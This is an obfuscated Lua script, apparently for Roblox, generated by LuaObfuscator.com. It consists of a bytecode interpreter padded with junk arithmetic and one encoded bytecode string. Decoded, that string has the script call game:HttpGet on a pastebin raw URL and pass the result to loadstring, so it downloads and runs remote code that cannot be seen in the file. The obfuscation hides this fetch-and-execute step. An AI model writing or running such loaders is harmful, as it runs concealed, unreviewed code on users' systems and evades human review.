--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then v21=function(v31,v32,v33)if v33 then local v70=(v31/((1528 -(994 + 532))^(v32-(3 -2))))%(((1624 -780) -(392 + 450))^(((v33-(1 + 0)) -(v32-(1 -0))) + (1205 -(237 + 967)))) ;return v70-(v70%(2 -1)) ;else local v71=91 -(33 + 58) ;local v72;while true do if (v71==(0 + 0)) then v72=(2 + 0)^(v32-1) ;return (((v31%(v72 + v72))>=v72) and 1) or ((46 + 131) -((211 -120) + 86)) ;end end end end;v22=nil;v22=function()local v39=v1(v16,v19,v19);v19=v19 + 1 ;return v39;end;v23=nil;v18=2;end if (v18==2) then v23=function()local v40=0 -0 ;local v41;local v42;while true do if (v40==(2 -1)) then return (v42 * (387 -((216 -109) + 24))) + v41 ;end if (v40==0) then v41,v42=v1(v16,v19,v19 + ((1782 + 196) -(1794 + 182)) );v19=v19 + (1725 -(1530 + 193)) ;v40=1;end end end;v24=nil;v24=function()local v43,v44,v45,v46=v1(v16,v19,v19 + (1783 -(1469 + 311)) );v19=v19 + 4 + 0 + 0 + 0 ;return (v46 * (4537369 + 12239847)) + (v45 * (66470 -(59 + 875))) + (v44 * (213 + 43)) + v43 ;end;v25=nil;v18=3;end if (v18==5) then v30=nil;v30=function(v34,v35,v36)local v47=0;local v48;local v49;local v50;while true do if (v47==1) then v50=v34[3];return function(...)local v78=1;local v79= -1;local v80={...};local v81=v12("#",...) -1 ;local function v82()local v85=v48;local v86=v49;local v87=v50;local v88=v28;local v89={};local v90={};local v91={};for v96=0,v81 do if (((5538 -3855)<4247) and (v96>=v87)) then v89[v96-v87 ]=v80[v96 + (2 -1) + 0 ];else v91[v96]=v80[v96 + (1 -0) ];end end local v92=(v81-v87) + 1 ;local v93;local v94;while true do local v97=0 + 0 ;local v98;while true do if (((770 + 394)<=(3696 -(1124 + 563))) and (v97==(0 + 0))) then v98=0;while true do if ((v98==(0 -0)) or (((13588 -8080) -(160 + 1385))==(22 + 3375))) then local v112=0;local v113;while true do if ((3832>=(639 + 2466)) and (v112==(0 + 0))) then v113=0;while true do if ((v113==(0 + 0)) or (2919==3336)) then local v121=0;while true do if ((v121==(0 -0)) or ((2297 -(143 + 100))>=(2104 + (917 -(628 + 97))))) then v93=v85[v78];v94=v93[(1453 -(759 + 693)) + 0 ];v121=1 + 0 ;end if (((2485 -(261 + 152))>124) and (v121==(1 -0))) then v113=830 -(326 + 503) ;break;end end end if (((3272 -(786 + 918))<3199) and (v113==((1 + 3) -3))) then v98=1 + 0 ;break;end end break;end end end if ((405>(101 -58)) and (v98==(1 -0))) then if ((v94<=2) or (943>(2330 -(557 + 381)))) then if ((v94<=0) or (2224==(1161 + 3197))) then local v114=(504 + 354) -(836 + (70 -48)) ;local v115;local v116;local v117;local v118;local v119;local v120;while true do if ((v114==0) or ((559 -148)>=(9996 -6618))) then v115=0 + 0 ;v116=nil;v114=1 -0 ;end if (((1799 -717)>(172 + 10)) and (v114==(2 + 0))) then v119=nil;v120=nil;v114=3;end if ((v114==((85 + 9) -(33 + (144 -86)))) or ((797 -(313 + 237))==(9232 -4324))) then while true do if (((722 + 2278)>=(860 + 177)) and (v115==(0 + 0 + 0))) then local v140=(908 -(864 + 44)) -0 ;while true do if (((3720 -1926)<(6894 -3905)) and (v140==(1 + (0 -0)))) then v115=937 -(12 + 924) ;break;end if ((v140==(0 -0)) or (1188<(1664 -(489 + 254)))) then v116=0 + 0 ;v117=nil;v140=1;end end end if (((4076 -2913)<=(24144 -19299)) and (v115==(1 -0))) then local v141=0 -0 ;while true do if ((v141==1) or (3407<=(2543 + 104))) then v115=1 + 1 ;break;end if (((3236 -(155 + 125))==(6785 -3829)) and (v141==(0 + 0))) then v118=nil;v119=nil;v141=1 + 0 + 0 ;end end end if ((((1607 -(47 + 999)) + 635 + 3572)>=1341) and (v115==(1385 -(993 + 390)))) then v120=nil;while true do if (((3579 -2256)==(2186 -(431 + 115 + 317))) and (v116==(1225 -(738 + 486)))) then local v150=(380 -(215 + 165)) + 0 ;while true do if (((553 + 3943)>(308 -88)) and (v150==(1 + 0))) then v116=2;break;end if (((577 + 697)<=(1790 + 549)) and (0==v150)) then v79=(v119 + v117) -1 ;v120=1015 -(259 + 461 + 295) ;v150=1 + 0 ;end end end if ((v116==(0 -0)) or ((2015 -(155 + 137))==((6446 -4268) + 243))) then local v151=254 -(143 + 111) ;while true do if ((v151==(0 -0)) or (((6191 -(162 + 503)) -(761 + 6 + 57))==(109 + 4190))) then local v161=524 -(402 + 122) ;while true do if ((v161==(0 + 0)) or ((567 -282)>1686)) then v117=v93[(72 + 798) -(809 + 59) ];v118,v119=v88(v91[v117](v13(v91,v117 + (3 -2) ,v93[9 -6 ])));v161=(90 + 18) -(10 + 97) ;end if ((4177>=(146 + 2337)) and (v161==(1 + 0))) then v151=1;break;end end end if ((v151==(1 + 0)) or ((1173 + 2976)<=(9342 -7347))) then v116=2 -1 ;break;end end end if ((2205<=((4684 -(276 + 1348)) + 1139)) and (v116==(3 -1))) then for v152=v117,v79 do local v153=0;local v154;while true do if (((1721 + 72)<(5239 -(832 + 677))) and (v153==0)) then v154=0;while true do if ((v154==(0 -0)) or ((4935 -1751)==(7999 -(4779 + 465)))) then v120=v120 + 1 ;v91[v152]=v118[v120];break;end end break;end end end break;end end break;end end break;end if ((v114==(1 -0)) or ((5830 -3567)>(3391 -(341 + 589)))) then v117=nil;v118=nil;v114=(1398 + 450) -(547 + 1299) ;end end elseif ((v94>(1 -0)) or ((1208 -((883 -(142 + 728)) + 3))==(4574 -(166 + 207)))) then local v122=(0 -0) -0 ;local v123;local v124;while true do if (((1468 + 743)>(2210 -(212 + 749))) and (0==v122)) then v123=96 -(94 + 2) ;v124=nil;v122=1 + 0 ;end if ((735<1980) and (v122==(4 -3))) then while true do if ((v123==(0 + 0)) or ((5738 -(5473 -(216 + 1048)))<=(4443 -3139))) then v124=v93[1 + 1 ];v91[v124]=v91[v124](v13(v91,v124 + (699 -(346 + 14 + 338)) ,v79));break;end end break;end end else v91[v93[2]]=v93[6 -3 ];end elseif ((v94<=(2 + (406 -(293 + 111)))) or ((2349 + 661)==(8407 -4986))) then if (((2053 -(625 + 95))>=68) and (v94==(2 + 1))) then local v127=0 + 0 ;local v128;local v129;local v130;local v131;while true do if ((v127==(102 -(8 + (1222 -(252 + 877))))) or (134>=((7300 -4051) -(1597 + 115)))) then v130=nil;v131=nil;v127=(46 -(28 + 16)) -0 ;end if ((v127==(0 -0)) or (3176<2642)) then v128=0;v129=nil;v127=1 -0 ;end if ((v127==2) or ((3248 -889)>(2779 + 297))) then while true do if ((v128==(1365 -(991 + 373))) or (369>(1067 + 230))) then v131=nil;while true do if (((142 + 1606 + 1952)>=114) and (v129==(0 + 0 + 0))) then local v155=954 -(396 + 558) ;local v156;while true do if ((v155==0) or (1667>=2515)) then v156=0;while true do if ((v156==0) or ((10883 -8408)<(4326 -2854))) then local v179=1831 -(1797 + 34) ;while true do if ((3454==(1676 + 1778)) and ((1 + 0)==v179)) then v156=1;break;end if ((v179==(916 -(586 + 330))) or ((5489 -(469 + 1436))<=(3756 -(192 + 513)))) then v130=v93[8 -6 ];v131=v91[v93[7 -4 ]];v179=1073 -(758 + 314) ;end end end if (((285 + 2643)<=(4246 -((90 -52) + 56))) and (v156==(1 + 0))) then v129=1;break;end end break;end end end if ((v129==(1 + (0 -0))) or ((1247 + 2845)==(349 + 1347))) then v91[v130 + (3 -2) + 0 ]=v131;v91[v130]=v131[v93[2 + 2 ]];break;end end break;end if ((((3609 -2384) -((2331 -(1104 + 298)) + 296))==v128) or ((7 + 103)==(17352 -12375))) then local v145=0 -0 ;while true do if ((v145==(1338 -(88 + 1209 + 40))) or ((4574 -(125 + 110))<=(3773 -(356 + 105)))) then v128=1 + 0 ;break;end if ((0==v145) or ((425 + 2501)>(3952 + 32))) then v129=0 + 0 ;v130=nil;v145=1222 -(920 + 301) ;end end end end break;end end else v91[v93[(1431 -(402 + 9)) -(410 + 608) ]]();end elseif ((v94==(1040 -(543 + 492))) or ((429 -(686 -446))==(1301 -((510 -(72 + 19)) + 189)))) then v91[v93[441 -((720 -421) + 140) ]]=v36[v93[(31 -24) -4 ]];else do return;end end v78=v78 + (3 -(998 -(4 + 992))) ;break;end end break;end end end end A,B=v28(v11(v82));if  not A[1] then local v99=v34[4][v78] or "?" ;error("Script error at ["   .. v99   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end if (v47==0) then v48=v34[1];v49=v34[2];v47=1;end end end;return v30(v29(),{},v17)(...);end if (v18==3) then v25=function()local v51=v24();local v52=v24();local v53=1 -0 ;local v54=(v21(v52,1,17 + 3 ) * ((1 + 1)^(79 -47))) + v51 ;local v55=v21(v52,10 + (1194 -(722 + 461)) ,8 + 23 );local v56=((v21(v52,7 + 25 )==(1 + 0 + 0)) and  -(1469 -(53 + 1415))) or (612 -(130 + 481)) ;if (v55==(0 -0)) then if (v54==(1477 -(396 + 1081))) then return v56 * (0 + 0) ;else v55=3 -2 ;v53=0 -0 ;end elseif (v55==((1687 -(494 + 564)) + 1418)) then return ((v54==0) and (v56 * ((1 + 0)/(0 + 0)))) or (v56 * NaN) ;end return v8(v56,v55-(3026 -2003) ) * (v53 + (v54/((5 -3)^(184 -132)))) ;end;v26=nil;v26=function(v37)local v57=0 + (55 -(41 + 14)) ;local v58;local v59;while true do if (v57==(935 -(895 + 40))) then v58=nil;if  not v37 then local v95=254 -(204 + 50) ;while true do if (v95==(0 -0)) then v37=v24();if (v37==(514 -(497 + 17))) then return "";end break;end end end v57=762 -((1680 -1153) + 234) ;end if (v57==(1 + 1)) then v59={};for v83=1, #v58 do v59[v83]=v2(v1(v3(v58,v83,v83)));end v57=1 + 2 ;end if ((9 -6)==v57) then return v6(v59);end if (v57==(529 -(401 + (211 -84)))) then v58=v3(v16,v19,(v19 + v37) -(3 -2) );v19=v19 + v37 ;v57=2;end end end;v27=v24;v18=4;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v60=0;local v61;local v62;local v63;local v64;local v65;local v66;local v67;local v68;local v69;while true do if ((1 + 3)~=v60) then else v69=nil;while true do if (v61==(1514 -(886 + 626))) then v66=nil;v67=nil;v61=1545 -(164 + 1378) ;end if (v61==(1782 -(1241 + 540))) then local v100=0 + 0 ;while true do if (v100==(1 + 0)) then v61=2;break;end if (v100==0) then v64=nil;v65=nil;v100=1 -0 ;end end end if (v61~=3) then else local v101=0;while true do if (v101~=1) then else v61=2 + 2 ;break;end if (v101==(0 -0)) then v68=nil;v69=nil;v101=1 + 0 ;end end end if (0~=v61) then else v62=0;v63=nil;v61=1 + 0 ;end if (v61==4) then while true do if (v62~=(3 + 0)) then else v69=nil;while true do local v109=0 -0 ;local v110;local v111;while true do if (v109~=1) then else while true do if (v110~=(0 -0)) then else v111=0 -0 ;while true do if (v111~=(1256 -(214 + 1041))) then else if (v63~=(1592 -(653 + 938))) then else local v137=0 -0 ;local v138;while true do if (v137==(0 -0)) then v138=276 -(101 + 175) ;while true do if (v138~=(0 -0)) then else v67={v64,v65,nil,v66};v68=v24();v138=204 -(155 + 48) ;end if (v138~=1) then else v69={};v63=2;break;end end break;end end end if (v63==(845 -(510 + 332))) then local v139=1097 -(15 + 1082) ;while true do local v142=0 -0 ;while true do if (v142~=0) then else if (v139~=(1260 -(660 + 600))) then else for v162=1,v24() do v65[v162-(3 -2) ]=v29();end for v164=1152 -(712 + 439) ,v24() do v66[v164]=v24();end v139=1 -0 ;end if (v139~=(1 + 0)) then else return v67;end break;end end end end break;end if (v111~=(0 + 0)) then else local v134=0;while true do if ((4 -3)==v134) then v111=2 -1 ;break;end if (v134~=(1069 -(478 + 591))) then else if (v63==(0 + 0)) then local v146=0 -0 ;local v147;local v148;while true do if (v146==(1 + 0)) then while true do if (v147~=(0 -0)) then else v148=0;while true do if ((1 + 0)==v148) then v66={};v63=1 -0 ;break;end if (v148~=(0 -0)) then else local v180=1367 -(669 + 698) ;while true do if (v180==0) then local v183=1971 -(1028 + 943) ;while true do if (1==v183) then v180=251 -(81 + 169) ;break;end if (v183==(832 -(219 + 613))) then v64={};v65={};v183=1 + 0 ;end end end if (v180~=(1 + 0)) then else v148=1632 -(512 + 1119) ;break;end end end end break;end end break;end if (v146~=(0 + 0)) then else v147=0 -0 ;v148=nil;v146=1 + 0 ;end end end if (v63~=(5 -3)) then else local v149=0 -0 ;while true do if (v149==0) then local v160=0;while true do if (v160==(1 + 0)) then v149=1 + 0 ;break;end if (v160~=0) then else for v172=1 -0 ,v68 do local v173=1679 -(1304 + 375) ;local v174;local v175;local v176;while true do if (v173~=(0 -0)) then else v174=0 + 0 ;v175=nil;v173=328 -(141 + 186) ;end if (v173~=1) then else v176=nil;while true do if (v174~=0) then else local v189=0 -0 ;while true do if (v189==(1438 -(247 + 1190))) then v174=1;break;end if (v189~=(1731 -(1425 + 306))) then else v175=v22();v176=nil;v189=397 -(346 + 50) ;end end end if ((1683 -(488 + 1194))~=v174) then else if (v175==(1523 -(374 + 1148))) then v176=v22()~=(0 + 0) ;elseif (v175==(7 -5)) then v176=v25();elseif (v175~=(1310 -(81 + 1226))) then else v176=v26();end v69[v172]=v176;break;end end break;end end end v67[1 + 2 ]=v22();v160=662 -(532 + 129) ;end end end if (v149~=(461 -(326 + 134))) then else for v166=1 + 0 ,v24() do local v167=0;local v168;local v169;while true do if (v167~=(740 -(68 + 672))) then else v168=454 -(333 + 121) ;v169=nil;v167=1 + 0 ;end if (v167==(1 + 0)) then while true do if ((0 + 0)==v168) then v169=v22();if (v21(v169,1206 -(554 + 651) ,1926 -(695 + 1230) )~=(0 -0)) then else local v184=0;local v185;local v186;local v187;local v188;while true do if (v184==(1 + 0)) then v187=nil;v188=nil;v184=2;end if (v184==(1305 -(27 + 1276))) then while true do if (v185~=(7 -5)) then else if (v21(v187,1,1 + 0 )==1) then v188[2]=v69[v188[2]];end if (v21(v187,1 + 1 ,2)==(1416 -(38 + 1377))) then v188[3]=v69[v188[881 -(141 + 737) ]];end v185=1 + 2 ;end if (v185~=0) then else local v191=0 -0 ;while true do if (v191~=(0 -0)) then else local v200=191 -(83 + 108) ;while true do if (v200~=(1994 -(537 + 1456))) then else v191=1;break;end if (v200~=(0 -0)) then else v186=v21(v169,7 -5 ,3);v187=v21(v169,12 -8 ,20 -14 );v200=1;end end end if (v191~=(1 + 0)) then else v185=1986 -(693 + 1292) ;break;end end end if (v185==1) then local v192=0 + 0 ;while true do if (v192==0) then local v201=0;while true do if (v201==0) then v188={v23(),v23(),nil,nil};if (v186==(1077 -(1072 + 5))) then local v202=0;while true do if (v202==(977 -(778 + 199))) then v188[3 + 0 ]=v23();v188[4]=v23();break;end end elseif (v186==1) then v188[1039 -(457 + 579) ]=v24();elseif (v186==(1 + 1)) then v188[3]=v24() -((2 + 0)^(9 + 7)) ;elseif (v186~=(4 -1)) then else local v207=0 -0 ;local v208;local v209;while true do if (v207==(0 + 0)) then v208=0 + 0 ;v209=nil;v207=3 -2 ;end if ((1 + 0)~=v207) then else while true do if (v208==0) then v209=0 -0 ;while true do if (v209~=0) then else v188[5 -2 ]=v24() -((2 + 0)^(82 -(21 + 45))) ;v188[1453 -(134 + 1315) ]=v23();break;end end break;end end break;end end end v201=1945 -(1051 + 893) ;end if (v201~=(43 -(28 + 14))) then else v192=1;break;end end end if (v192~=(745 -(333 + 411))) then else v185=2;break;end end end if ((1663 -(253 + 1407))==v185) then if (v21(v187,3,3 + 0 )==1) then v188[18 -14 ]=v69[v188[4 + 0 ]];end v64[v166]=v188;break;end end break;end if (v184==(0 + 0)) then v185=763 -(266 + 497) ;v186=nil;v184=1;end end end break;end end break;end end end v63=1 + 2 ;break;end end end v134=1;end end end end break;end end break;end if (v109==(1401 -(1209 + 192))) then v110=0 -0 ;v111=nil;v109=3 -2 ;end end end break;end if (v62==(827 -(55 + 770))) then v67=nil;v68=nil;v62=3;end if (v62~=(0 + 0)) then else local v108=0 + 0 ;while true do if (v108==(0 + 0)) then v63=910 -(653 + 257) ;v64=nil;v108=1 + 0 ;end if (v108~=(1 + 0)) then else v62=1;break;end end end if (v62==1) then v65=nil;v66=nil;v62=1680 -(707 + 971) ;end end break;end end break;end if (v60~=(3 + 0)) then else v67=nil;v68=nil;v60=6 -2 ;end if (v60~=(300 -(37 + 261))) then else v65=nil;v66=nil;v60=11 -8 ;end if (0==v60) then v61=0;v62=nil;v60=1;end if ((1 + 0)~=v60) then else v63=nil;v64=nil;v60=4 -2 ;end end end;v18=5;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then v20=v0(v3(v38,1,1));return "";else local v73=0;local v74;while true do if (v73==0) then v74=v2(v0(v38,16));if v20 then local v102=0;local v103;while true do if (v102==1) then return v103;end if (v102==0) then v103=v5(v74,v20);v20=nil;v102=1;end end else return v74;end break;end end end end);v21=nil;v18=1;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F5A6475546D527A6500083O0012053O00013O001205000100023O002003000100010003001201000300046O000100034O00025O00022O00043O000100012O00063O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
